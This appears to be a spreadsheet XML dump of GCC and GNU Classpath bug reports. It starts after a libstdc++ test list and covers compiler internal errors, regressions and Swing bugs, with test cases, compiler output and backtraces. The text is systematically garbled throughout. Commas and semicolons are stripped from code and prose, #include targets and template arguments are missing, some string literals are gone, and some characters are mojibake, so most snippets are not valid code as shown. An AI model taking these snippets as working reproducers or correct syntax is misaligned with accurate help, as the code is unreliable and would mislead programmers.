+libstdc++.sum 26_numerics/random/shuffle_order_engine/cons/base_move.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/cons/default.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/cons/seed1.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/cons/seed2.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/cons/seed_seq.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/operators/equal.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/operators/serialize.cc
+libstdc++.sum 26_numerics/random/shuffle_order_engine/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/student_t_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/student_t_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/student_t_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/student_t_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/subtract_with_carry_engine/cons/default.cc
+libstdc++.sum 26_numerics/random/subtract_with_carry_engine/cons/seed1.cc
+libstdc++.sum 26_numerics/random/subtract_with_carry_engine/cons/seed2.cc
+libstdc++.sum 26_numerics/random/subtract_with_carry_engine/operators/equal.cc
+libstdc++.sum 26_numerics/random/subtract_with_carry_engine/operators/serialize.cc
+libstdc++.sum 26_numerics/random/subtract_with_carry_engine/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/uniform_int_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/uniform_int_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/uniform_int_distribution/cons/parms_neg.cc
+libstdc++.sum 26_numerics/random/uniform_int_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/uniform_int_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/uniform_real_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/uniform_real_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/uniform_real_distribution/cons/parms_neg.cc
+libstdc++.sum 26_numerics/random/uniform_real_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/uniform_real_distribution/requirements/typedefs.cc
+libstdc++.sum 26_numerics/random/weibull_distribution/cons/default.cc
+libstdc++.sum 26_numerics/random/weibull_distribution/cons/parms.cc
+libstdc++.sum 26_numerics/random/weibull_distribution/operators/serialize.cc
+libstdc++.sum 26_numerics/random/weibull_distribution/requirements/typedefs.cc
(list not truncated if this line seen)</t>
  </si>
  <si>
    <t>CLASSPATH-22966</t>
  </si>
  <si>
    <t>swing: JTextArea.setText() causes StringIndexOutOfBoundsException later</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Compile and run the attached testcase.
Expected results:
1. A window shows up. It has an empty 10x40 textara.
Actual results:
1. No window is shown and program throws the following exception:
java.lang.StringIndexOutOfBoundsException
   at java.lang.String. (String.java:512)
   at java.lang.String. (String.java:237)
   at gnu.java.awt.peer.gtk.GdkFontMetrics.charsWidth (GdkFontMetrics.java:97)
   at javax.swing.text.PlainView.getPreferredSpan (PlainView.java:228)
   at javax.swing.plaf.basic.BasicTextUI$RootView.getPreferredSpan (BasicTextUI.java:136)
   at javax.swing.plaf.basic.BasicTextUI.getPreferredSize (BasicTextUI.java:464)
   at javax.swing.JComponent.getPreferredSize (JComponent.java:1032)
   at javax.swing.JRootPane$RootLayout.preferredLayoutSize (JRootPane.java:278)
   at java.awt.Container.preferredSize (Container.java:626)
   at java.awt.Container.getPreferredSize (Container.java:613)
   at javax.swing.JComponent.getPreferredSize (JComponent.java:1036)
   at java.awt.BorderLayout.calcCompSize (BorderLayout.java:655)
   at java.awt.BorderLayout.calcSize (BorderLayout.java:700)
   at java.awt.BorderLayout.preferredLayoutSize (BorderLayout.java:454)
   at java.awt.Container.preferredSize (Container.java:626)
   at java.awt.Container.getPreferredSize (Container.java:613)
   at javax.swing.JFrame.getPreferredSize (JFrame.java:91)
   at java.awt.Window.pack (Window.java:267)
   at textarea. (textarea.java:11)
   at textarea.main (textarea.java:4)
Testcase:
import javax.swing.*
public class textarea extends JFrame {
        public static void main(String[] a) {
                (new textarea()).show()
        }
        public textarea() {  
                JTextArea textarea = new JTextArea(10 40)
                textarea.setText(text0
)
                textarea.setText()
                this.setContentPane(textarea)
                this.pack()
        }
}
Note that this is very similar to bug 13230.</t>
  </si>
  <si>
    <t>CLASSPATH-22762</t>
  </si>
  <si>
    <t>setClip(null) should remove clip</t>
  </si>
  <si>
    <t>In Sun's Java Graphics.setClip(null) resets the current clip to the device clip i.e. removes the user clip. This is not explicitly specced but is implicit in that Graphics.getClip() is specced to return null when there is no user clip and setClip() is specced to take those values that getClip() returns. In the current Classpath however setClip(null) throws a NullPointerException as a null value is not checked for.</t>
  </si>
  <si>
    <t>GCC-414</t>
  </si>
  <si>
    <t>Instantiating templates with typedef fails on 'operator==' function</t>
  </si>
  <si>
    <t>When creating specializations of a template for some type
instantiation fails for 'operator==' et al functions if
typedef is used. Any other function instantiates correctly
regardless of whether type argument is passed directly to a 
template or through a typedef.
Release:
unknown
Environment:
Linux 2.2.14-5.0 i686 (Standard RedHat 6.1 on Intel Pentium III)
How-To-Repeat:
g++ -c instantiationProblem.C</t>
  </si>
  <si>
    <t>mon</t>
  </si>
  <si>
    <t>GCC-2038</t>
  </si>
  <si>
    <t>struct used int expected</t>
  </si>
  <si>
    <t>I recently upgraded a slack7.1 box to binutils 2.1.10 gnu c lib 2.2.2 and gcc 2.95.2
After this I get compile errors with wrong syntax (avifile-0.53.5 for example) even if I tried recompiling gcc again.
It seems like the error is coming from /usr/include/g++-3 files
The files in this dir are the ones coming from gcc-2.95.2 I previously installed.
root@tube:/usr/src/gcc-2.95.2/i686-pc-linux-gnu/libio# /usr/src/gcc-2.95.2/gcc/xgcc -v -save-temps -B/usr/src/gcc-2.95.2/gcc/ -B/dritt/i686-pc-linux-gnu/bin/ -c -g -O2 -fvtable-thunks -D_GNU_SOURCE -fno-implicit-templates -I. -I. -nostdinc++ -D_IO_MTSAFE_IO indstream.cc
Reading specs from /usr/src/gcc-2.95.2/gcc/specs
gcc version 2.95.2 19991024 (release)
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 .
 /usr/src/gcc-2.95.2/gcc/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /dritt/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3
 /dritt/include
 /dritt/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../i686-pc-linux-gnu/include
 /dritt/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/include
End of omitted list.
 /usr/src/gcc-2.95.2/gcc/cc1plus indstream.ii -quiet -dumpbase indstream.cc -g -O2 -version -fvtable-thunks -fno-implicit-templates -o indstream.s
GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux-gnu) compiled by GNU C version 2.95.2 19991024 (release).
indstream.cc: In method `struct streampos indirectbuf::seekoff(long long int ios::seek_dir int = 3)':
indstream.cc:82: `struct streampos' used where a `int' was expected
indstream.cc:85: `struct streampos' used where a `int' was expected
indstream.cc:87: `struct streampos' used where a `int' was expected
indstream.cc:89: conversion from `int' to non-scalar type `streampos' requested
indstream.cc: In method `struct streampos indirectbuf::seekpos(_G_fpos64_t int = 3)':
indstream.cc:99: `struct streampos' used where a `int' was expected
indstream.cc:102: `struct streampos' used where a `int' was expected
indstream.cc:104: `struct streampos' used where a `int' was expected
indstream.cc:106: conversion from `int' to non-scalar type `streampos' requested
=============================
avifile make
make[3]: Entering directory `/usr/src/avifile-0.53.5/lib/videocodec/DirectShow'
/bin/sh ../../../libtool --silent --mode=compile c++ -DHAVE_CONFIG_H -I. -I. -I../../../include   -g  -march=i586 -I/usr/X11R6/include -I/usr/local/include -I/usr/local/include/SDL -D_REENTRANT -w  -I../../../include -march=i586 -c guids.cpp
/bin/sh ../../../libtool --silent --mode=compile c++ -DHAVE_CONFIG_H -I. -I. -I../../../include   -g  -march=i586 -I/usr/X11R6/include -I/usr/local/include -I/usr/local/include/SDL -D_REENTRANT -w  -I../../../include -march=i586 -c inputpin.cpp
/bin/sh ../../../libtool --silent --mode=compile c++ -DHAVE_CONFIG_H -I. -I. -I../../../include   -g  -march=i586 -I/usr/X11R6/include -I/usr/local/include -I/usr/local/include/SDL -D_REENTRANT -w  -I../../../include -march=i586 -c outputpin.cpp
/bin/sh ../../../libtool --silent --mode=compile c++ -DHAVE_CONFIG_H -I. -I. -I../../../include   -g  -march=i586 -I/usr/X11R6/include -I/usr/local/include -I/usr/local/include/SDL -D_REENTRANT -w  -I../../../include -march=i586 -c allocator.cpp
In file included from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/iostream.h:31
                 from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/stl_algobase.h:53
                 from /usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/list:30
                 from allocator.h:6
                 from allocator.cpp:2:
/usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/streambuf.h: In method `struct streampos streambuf::pubseekoff(long long int ios::seek_dir int = 3)':
/usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/streambuf.h:362: conversion from `__off64_t' to non-scalar type `streampos' requested
/usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/streambuf.h: In method `struct streampos streambuf::pubseekpos(_G_fpos64_t int = 3)':
/usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3/streambuf.h:364: `struct streampos' used where a `long long int' was expected
make[3]: *** [allocator.lo] Error 1
Release:
linux-2.2.18+lids+ow+stealth+ipacct+freeswan+mosix
Environment:
BASH=/bin/bash
BASH_VERSINFO=([0]=2 [1]=04 [2]=0 [3]=1 [4]=release [5]=i386-slackware-linux-gnu)
BASH_VERSION='2.04.0(1)-release'
CLASSPATH='/usr/local/java/bin:/usr/local/java/jre:/usr/local/java/src:'
COLUMNS=158
DIRSTACK=()
EUID=0
GROUPS=()
HISTFILE=/dev/null
HISTFILESIZE=500
HISTSIZE=500
HOME=/root
HOSTNAME=tube.ssc.net
HOSTTYPE=i386
HZ=100
IFS='   
'
JAVA2_HOME=/usr/local/java
JAVA_HOME=/usr/local/java
LC_ALL=POSIX
LESS=-M
LESSOPEN='|lesspipe.sh %s'
LINES=75
LOGNAME=root
LS_COLORS='no=00:fi=00:di=0134:ln=0136:pi=4033:so=0135:bd=403301:cd=403301:or=403101:ex=0132:*.cmd=0132:*.exe=0132:*.com=0132:*.btm=0132:*.bat=0132:*.tar=0131:*.tgz=0131:*.arj=0131:*.taz=0131:*.lzh=0131:*.zip=0131:*.bz2=0131:*.rpm=0131:*.deb=0131:*.z=0131:*.Z=0131:*.gz=0131:*.jpg=0135:*.gif=0135:*.bmp=0135:*.ppm=0135:*.tga=0135:*.xbm=0135:*.xpm=0135:*.tif=0135:*.mpg=0137:*.avi=0137:*.mov=0137:'
LS_OPTIONS=' --color=auto -F -b -T 0'
MACHTYPE=i386-slackware-linux-gnu
MAIL=/var/spool/mail/root
MAILCHECK=60
MANPATH=/usr/local/man:/usr/man/preformat:/usr/man:/usr/X11R6/man:/usr/openwin/man
MINICOM='-c on'
MOZILLA_HOME=/usr/lib/netscape
OLDPWD=/usr/src/gcc-2.95.2/i686-pc-linux-gnu
OPENWINHOME=/usr/openwin
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/java/bin:/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/usr/openwin/bin:/usr/games:/usr/local/java/bin/:/usr/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/
PIPESTATUS=([0]=127)
PPID=700
PS1='\u@\h:\w\$ '
PS2='&gt; '
PS4='+ '
PWD=/usr/src/gcc-2.95.2/i686-pc-linux-gnu/libio
SHELL=/bin/bash
SHELLOPTS=braceexpand:hashall:histexpand:monitor:ignoreeof:interactive-comments:emacs
SHLVL=1
TERM=xterm
UID=0
USER=root
_=gccbug
file='/etc/profile.d/*.sh'
ignoreeof=0</t>
  </si>
  <si>
    <t>jorgen</t>
  </si>
  <si>
    <t>GCC-28974</t>
  </si>
  <si>
    <t>Extremely slow compilation of enumerated DATA statements.</t>
  </si>
  <si>
    <t>Compilation of enumerated DATA statements is extremely slow. 
Related PR: 
 * http://gcc.gnu.org/bugzilla/show_bug.cgi?id=13465
Related threads on ML: 
 * http://gcc.gnu.org/ml/fortran/2004-08/msg00131.html
 * http://gcc.gnu.org/ml/fortran/2006-09/msg00025.html
Shell script to generate example data:
$&gt; cat datagen.sh
#! /bin/bash
outfile=data.f90
dim1=50
dim2=1000
echo MODULE appdata                              &gt;  ${outfile}
echo INTEGER :: thedata(${dim1} ${dim2})        &gt;&gt; ${outfile}
for i in `seq 1 ${dim1}`  do
  for j in `seq 1 ${dim2}`  do
    echo DATA thedata(${i} ${j}) / $((i*j)) /   &gt;&gt; ${outfile}
  done
done
echo END MODULE                                  &gt;&gt; ${outfile}
P4 3.2 GHz 2GB RAM:
$&gt; bash datagen.sh
$&gt; time gfortran-4.2 -c data.f90
real    3m31.646s
user    3m29.545s
sys     0m0.172s</t>
  </si>
  <si>
    <t>franke.daniel</t>
  </si>
  <si>
    <t>GCC-47172</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] cannot call member function without object</t>
  </si>
  <si>
    <t>The following code fails to compile with -std=c++0x but compiles with c++98 or if I change the prototype of f to make it return void. It doesn't look like PR 46731.
struct A
{
    int f() const
}
template 
struct B : A { }
template 
struct C : B
{
    void g()
}
template 
void C::g()
{
    A::f()
}
bug.cpp:18:11: error: cannot call member function 'int A::f() const' without object</t>
  </si>
  <si>
    <t>CLASSPATH-24335</t>
  </si>
  <si>
    <t>DocumentEvents contain the wrong information</t>
  </si>
  <si>
    <t>The testcase attached shows that we are attaching an ElementChange to DocumentEvents when we should not be. 
Expected output: 
insert
java.lang.NullPointerException
Actual output:
insert
removed: 1
added: 1</t>
  </si>
  <si>
    <t>GCC-78618</t>
  </si>
  <si>
    <t>ICE in gfc_check_rank at fortran/check.c:3670</t>
  </si>
  <si>
    <t>With invalid code down to at least 4.8 :
$ cat z1.f90
program p
   character parameter :: c = char(2564)
   print * rank(c)
end
$ gfortran-7-20161127 z1.f90
f951: internal compiler error: Segmentation fault
0xc4532f crash_signal
        ../../gcc/toplev.c:333
0x66bb6b gfc_check_rank(gfc_expr*)
        ../../gcc/fortran/check.c:3670
0x6a0f34 check_specific
        ../../gcc/fortran/intrinsic.c:4506
0x6aad94 gfc_intrinsic_func_interface(gfc_expr* int)
        ../../gcc/fortran/intrinsic.c:4721
0x6f2814 resolve_unknown_f
        ../../gcc/fortran/resolve.c:2733
0x6f2814 resolve_function
        ../../gcc/fortran/resolve.c:3035
0x6f291a gfc_resolve_expr(gfc_expr*)
        ../../gcc/fortran/resolve.c:6482
0x6f8f32 gfc_resolve_code(gfc_code* gfc_namespace*)
        ../../gcc/fortran/resolve.c:10818
0x6f8c07 gfc_resolve_blocks(gfc_code* gfc_namespace*)
        ../../gcc/fortran/resolve.c:9865
0x6f903b gfc_resolve_code(gfc_code* gfc_namespace*)
        ../../gcc/fortran/resolve.c:10808
0x6fba22 resolve_codes
        ../../gcc/fortran/resolve.c:16025
0x6fbb1e gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:16060
0x6e609a resolve_all_program_units
        ../../gcc/fortran/parse.c:5977
0x6e609a gfc_parse_file()
        ../../gcc/fortran/parse.c:6224
0x729ee2 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:202</t>
  </si>
  <si>
    <t>GCC-68338</t>
  </si>
  <si>
    <t>tsan report error about c++11 static local initialize</t>
  </si>
  <si>
    <t>With code like this:
#include 
#include 
#include 
std::string message()
{
	static std::string msg(hi)
	return msg
}
int main()
{
	std::thread t1([]() { std::cout &lt;&lt; message() &lt;&lt; \n })
	std::thread t2([]() { std::cout &lt;&lt; message() &lt;&lt; \n })
	t1.join()
	t2.join()
}
compile like this:
g++ -O3 -g3 -fsanitize=thread -Wall -std=c++11 -pthread -Wextra test.cpp
according to c++11 statnadard such code should be thread safe
at the same time if replate g++(gcc 5.2) by clang++(clang 3.7)
it does run without any reported failures.</t>
  </si>
  <si>
    <t>dushistov</t>
  </si>
  <si>
    <t>GCC-82545</t>
  </si>
  <si>
    <t>[7 Regression] -O2: ICE in gimple_split_edge at tree-cfg.c:2838 during GIMPLE pass sanopt</t>
  </si>
  <si>
    <t>gcc 8 and 7 produce an internal compiler error on the following program (also) attached.
$ gcc --version
gcc (GCC) 8.0.0 20171012 (experimental)
$ uname -a
Linux 4.10.0-37-generic #41-Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux
$ gcc -O2 -fsanitize=address -c reduced.c
during GIMPLE pass: sanopt
reduced.c: In function â€˜aâ€™:
reduced.c:4:6: internal compiler error: in gimple_split_edge at tree-cfg.c:2838
 void a(void) {
      ^
0x6b9315 gimple_split_edge
	../../src/gcc/tree-cfg.c:2838
0x99a5cd split_edge(edge_def*)
	../../src/gcc/cfghooks.c:638
0xafc5d7 gimple_find_edge_insert_loc
	../../src/gcc/gimple-iterator.c:793
0xafd36d gsi_commit_one_edge_insert(edge_def* basic_block_def**)
	../../src/gcc/gimple-iterator.c:884
0xafd43e gsi_commit_edge_inserts()
	../../src/gcc/gimple-iterator.c:863
0x6b0d11 execute
	../../src/gcc/sanopt.c:1359
gcc 8: FAIL ICE produced.     SVN version 253695.
gcc 7: FAIL ICE produced.     SVN version 253695 gcc-7-branch.
gcc 6: PASS ICE not produced. SVN version 253695 gcc-6-branch.</t>
  </si>
  <si>
    <t>GCC-44266</t>
  </si>
  <si>
    <t>stack frame lacks parameter save area</t>
  </si>
  <si>
    <t>A function that makes no other calls besides calls to __tls_get_addr does not allocate a stack frame with a parameter save area.  According to the PowerPC64 ABI any function that makes calls must allocate at least a 112 byte stack frame.  This testcase extracted from libstdc++
/* -m64 -fPIC -O2 */
int *
get_global (void)
{
  static __thread int global
  return 
}
results in
	mflr 0
	std 016(1)
	stdu 1-48(1)
	addi 32.LANCHOR0@got@tlsld
	bl __tls_get_addr
	nop
	addi 1148
	addis 33.LANCHOR0@dtprel@ha
	addi 33.LANCHOR0@dtprel@l
	ld 016(1)
	mtlr 0
	blr
Note the 48 byte stack frame.</t>
  </si>
  <si>
    <t>GCC-42083</t>
  </si>
  <si>
    <t>[C++0x] ICE on invalid with tree check: expected aggr_init_expr have error_mark in build_value_init</t>
  </si>
  <si>
    <t>This code (in includes needed) ICEs with GCC 4.5 20091112
template
decltype(F()) run(F f)
   {
   return f()
   }
int main()
   {
   auto l = []() { return 5 }
   run(l)
   }
Compiler output:
$ g++-4.5-20091112 -std=c++0x decl.cpp -o decl
decl.cpp: In function 'int main()':
decl.cpp:14:9: error: no matching function for call to 'main()::::__lambda0()'
decl.cpp:12:11: note: candidates are: main()::::(const main()::&amp;)
decl.cpp:12:11: note:                 main()::::(main()::&amp;&amp;)
decl.cpp:14:9: internal compiler error: tree check: expected aggr_init_expr have error_mark in build_value_init at cp/init.c:319
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-80682</t>
  </si>
  <si>
    <t>__is_trivially_constructible(void int) returns true.</t>
  </si>
  <si>
    <t>Reproducer:
// g++ -std=c++11 -fsyntax-only
static_assert(!__is_trivially_constructible(void int) )
This seems blatantly incorrect.</t>
  </si>
  <si>
    <t>GCC-55362</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE with size() on character pointer</t>
  </si>
  <si>
    <t>From http://gcc.gnu.org/ml/fortran/2012-11/msg00034.html
the following test
program ice_test
  implicit none
  write(**) 'message: ' size(Error_Msg)Error_Msg()
contains
  function Error_Msg() result(ErrorMsg)
    character dimension(:) pointer :: ErrorMsg
    character dimension(1) target :: str = '!'
    ErrorMsg =&gt; str
  end function Error_Msg
end program ice_test
gives an ICE when compiled with 4.6.3 4.7.2
error_msg.f90:3:0: internal compiler error: in gfc_conv_intrinsic_size at fortran/trans-intrinsic.c:4427 (4.6) or 5059 (4.7)
and trunk (r193382)
error_msg.f90:3:0: internal compiler error: in gfc_conv_expr_descriptor at fortran/trans-array.c:6417
   write(**) 'message: ' size(Error_Msg)Error_Msg()
while 4.5.3 gives an error
error_msg.f90:3.31:
  write(**) 'message: ' size(Error_Msg)Error_Msg()
                               1
Error: Internal procedure 'error_msg' is not allowed as an actual argument at (1)
In all cases the ICE occurs in gfc_conv_intrinsic_size (4.6/4.7) or gfc_conv_expr_descriptor (4.8) at
  gcc_assert (ss != gfc_ss_terminator)
Revision 163532 (2010-08-24) gives the error revision 163841 (2010-09-03) gives the ICE (a lot of changes in this range: f2008 intrinsics and float_128).
The backtrace for 4.6 revision 182981 is
#1  0x00000001000e62f6 in gfc_conv_intrinsic_function (se=0x7fff5fbfd2a0 expr=0x141d0d870) at ../../p6_work/gcc/fortran/trans-intrinsic.c:4427
#2  0x00000001000d7043 in gfc_conv_function_expr (se=0x7fff5fbfd2a0 expr=) at ../../p6_work/gcc/fortran/trans-expr.c:4064
#3  0x00000001000d1b33 in gfc_conv_expr_reference (se=0x7fff5fbfd2a0 expr=) at ../../p6_work/gcc/fortran/trans-expr.c:4889
#4  0x00000001000eabcf in gfc_trans_transfer (code=0x141d0dba0) at ../../p6_work/gcc/fortran/trans-io.c:2314
#5  0x00000001000b01e8 in trans_code (code=0x141d0dba0 cond=0x141c61498) at ../../p6_work/gcc/fortran/trans.c:1382
#6  0x00000001000e8896 in build_dt (function=0x141ef8800 code=0x141d0df60) at ../../p6_work/gcc/fortran/trans-io.c:1838
#7  0x00000001000b0228 in trans_code (code=0x141d0df60 cond=0x0) at ../../p6_work/gcc/fortran/trans.c:1354
#8  0x00000001000caa81 in gfc_generate_function_code (ns=) at ../../p6_work/gcc/fortran/trans-decl.c:4827
#9  0x000000010006ff1c in gfc_parse_file () at ../../p6_work/gcc/fortran/parse.c:4265
#10 0x00000001000aba36 in gfc_be_parse_file () at ../../p6_work/gcc/fortran/f95-lang.c:250
#11 0x0000000100626b3e in toplev_main (argc=2 argv=0x7fff5fbfd7a8) at ../../p6_work/gcc/toplev.c:579
and for trunk revision 193329
#12 0x00000001000d9162 in gfc_conv_expr_descriptor (se= expr=)
    at ../../p_work/gcc/fortran/trans-array.c:6417
#13 0x00000001000f827d in gfc_conv_intrinsic_size (se= expr=)
    at ../../p_work/gcc/fortran/trans-intrinsic.c:5052
#14 0x0000000100104ee6 in gfc_conv_intrinsic_function (se= expr=)
    at ../../p_work/gcc/fortran/trans-intrinsic.c:6763
#15 0x00000001000eff59 in gfc_conv_expr (se= expr=) at ../../p_work/gcc/fortran/trans-expr.c:5408
#16 0x00000001000f4226 in gfc_conv_expr_reference (se= expr=)
    at ../../p_work/gcc/fortran/trans-expr.c:6244
#17 0x000000010010b890 in gfc_trans_transfer (code=0x141514b00) at ../../p_work/gcc/fortran/trans-io.c:2307
#18 0x00000001000c7d88 in trans_code (code=0x141514b00 cond=0x141b0ee88) at ../../p_work/gcc/fortran/trans.c:1510
#19 0x0000000100109666 in build_dt (function=0x141b09e00 code=0x141514ec0) at ../../p_work/gcc/fortran/trans-io.c:1831
#20 0x00000001000c7da8 in trans_code (code=0x141514ec0 cond=0x0) at ../../p_work/gcc/fortran/trans.c:1482
#21 0x00000001000e6b14 in gfc_generate_function_code (ns=) at ../../p_work/gcc/fortran/trans-decl.c:5349
#22 0x000000010008435c in gfc_parse_file () at ../../p_work/gcc/fortran/parse.c:4467
#23 0x00000001000c3e86 in gfc_be_parse_file () at ../../p_work/gcc/fortran/f95-lang.c:191
#24 0x0000000100669989 in compile_file () at ../../p_work/gcc/toplev.c:544
#25 0x000000010066b7e9 in toplev_main(int char**) (argc=2 argv=0x7fff5fbfd780) at ../../p_work/gcc/toplev.c:1797
#26 0x000000010000a7c4 in start (pc= bases=0x0) at ../../../p_work/libgcc/config/unwind-dw2-fde-darwin.c:271</t>
  </si>
  <si>
    <t>GCC-1808</t>
  </si>
  <si>
    <t>Internal compiler error 390.</t>
  </si>
  <si>
    <t>ahts.c: In function `int main()':
ahts.c:14: Internal compiler error 390.
ahts.c:14: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
ahts.c:14: See  for details.
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
Redhat Linux 6.1/Pentium III 450 MHz
How-To-Repeat:
#include 
#include 
#include 
using namespace std
map dist
int main(void)
{
	int from
	ifstream fin2(data)
	while(fin2 &gt;&gt; from &gt;&gt; distance){
		dist.insert(pair(from distance))
	}
	fin2.close()
	return 0
}</t>
  </si>
  <si>
    <t>kanitkar</t>
  </si>
  <si>
    <t>GCC-40765</t>
  </si>
  <si>
    <t>[LTO] ICE verify_ssa failed</t>
  </si>
  <si>
    <t>ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-languages=c --enable-lto --disable-bootstrap
Thread model: posix
gcc version 4.5.0 20090714 (experimental) [lto revision 149644] (lto merged with rev 149625)
ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -B. getconf.i -flto -c -O
ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -B. confvar.i -flto -c -O
ryan@ryan:~/gcc/lto/x86-build/gcc$ ./xgcc -B. getconf.o confvar.o -flto -shared
In function Ã¢mainÃ¢:
lto1: error: address taken but ADDRESSABLE bit not set
PHI argument
for PHI node
p_93 = PHI 
lto1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: ././xgcc returned 1 exit status
collect2: lto-wrapper returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-11151</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] __builtin_return(__builtin_apply(...)) gives wrong result</t>
  </si>
  <si>
    <t>__builtin_return(__builtin_apply(...)) does not return the correct value on
Solaris/SPARC systems.  Using the test code from bug 8028:
--------------- BEGIN foo.c ---------------
int foo(int n)
{
    return n
}
int bar(int n)
{
    return n+1
}
int quux(int n)
{
    foo(0)
    __builtin_return(__builtin_apply((void *)bar __builtin_apply_args() 64))
}
int main(int argc char **argv)
{
    return quux(argc)
}
---------------- END foo.c ----------------
(compiled with gcc -O0 foo.c -o foo) should exit with a value of argc+1 but
instead exits with 0 on my system.  I'm not a SPARC assembly expert by any
means but the following part of the assembly generated for quux() looks suspicious:
        call    bar 0          &lt;-- __builtin_apply(bar...)
        nop
        nop
        std     %o0 [%fp-64]   &lt;-- save return value at -64(%fp)
        std     %f0 [%fp-56]
        mov     %l1 %sp
        add     %fp -64 %o1   &lt;-- %o1 = %fp-64
        [...]
        ld      [%o1] %i0      &lt;-- restore return value
        ld      [%o1+4] %i1
        ld      [%o1+8] %f0
        ld      [%o1+12] %f1
        mov     %o0 %i0        &lt;-- return value overwritten (BUG?)
        nop
        ret
        restore
The best guess I can make is that GCC is forgetting that the return value has
already been restored to %i0 and tries to copy it from %o0 which contains
garbage (it's used for other purposes in the intervening code omitted here for
brevity).</t>
  </si>
  <si>
    <t>gcczilla1</t>
  </si>
  <si>
    <t>GCC-35185</t>
  </si>
  <si>
    <t>ICE using openmp with g++-4.2</t>
  </si>
  <si>
    <t>System: Ubuntu 7.10
gcc version: 4.2.0
Problem: Using openmp extension
erro interno de compilaÃ§Ã£o: in create_tmp_var at gimplify.c:487</t>
  </si>
  <si>
    <t>edgurgel</t>
  </si>
  <si>
    <t>GCC-1130</t>
  </si>
  <si>
    <t>SP mismatch error from certain code constructs</t>
  </si>
  <si>
    <t xml:space="preserve">From: Alexandre Petit-Bianco 
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: Re: gcj/122: SP mismatch error from certain code constructs
Date: Mon 3 Jan 2000 22:44:09 -0800 (PST)
 jmacnish@ideaforge.net writes:
 &gt; When compiling a test java program (included) GCJ bails out with:
 &gt; 
 &gt; internal error - SP mismatch
 Thanks for the bug report. Warren Levy already reported the bug to me
 a few weeks ago. I came up with a Q&amp;D patch that I later refined and
 had reviewed by Per Bothner who suggested a better fix that I still
 have to work on.
 I'll keep Gnats posted.
 ./A
</t>
  </si>
  <si>
    <t>jmacnish</t>
  </si>
  <si>
    <t>GCC-54312</t>
  </si>
  <si>
    <t>uniquify_nodes takes 12% of Mozilla LTO build</t>
  </si>
  <si>
    <t>uniquify_nodes has quadratic loop removing types from variant lists:
          /* Remove us from our main variant list if we are not the
             variant leader.  */
          if (TYPE_MAIN_VARIANT (t) != t)
            {
              tem = TYPE_MAIN_VARIANT (t)
              while (tem &amp;&amp; TYPE_NEXT_VARIANT (tem) != t)
                tem = TYPE_NEXT_VARIANT (tem)
              if (tem)
                TYPE_NEXT_VARIANT (tem) = TYPE_NEXT_VARIANT (t)
              TYPE_NEXT_VARIANT (t) = NULL_TREE
            }
this consume a lot of time building Mozilla (and was introduced by Michael's patch cleaning up the stream in process). Can't we do a bit better here?
(this was introduced in 4.7)
Honza</t>
  </si>
  <si>
    <t>GCC-47733</t>
  </si>
  <si>
    <t>psignal (int const? char*) in libiberty/strsignal.h</t>
  </si>
  <si>
    <t>I compile gcc with:
../gcc-4.5.2/configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-threads=posix --enable-languages=cc++ --enable-targets=all --with-newlib --with-build-time-tools=/usr/x86_64-pc-linux-gnu/bin/ --disable-shared --disable-libgomp --disable-lto --disable-libssp --disable-libmudflap
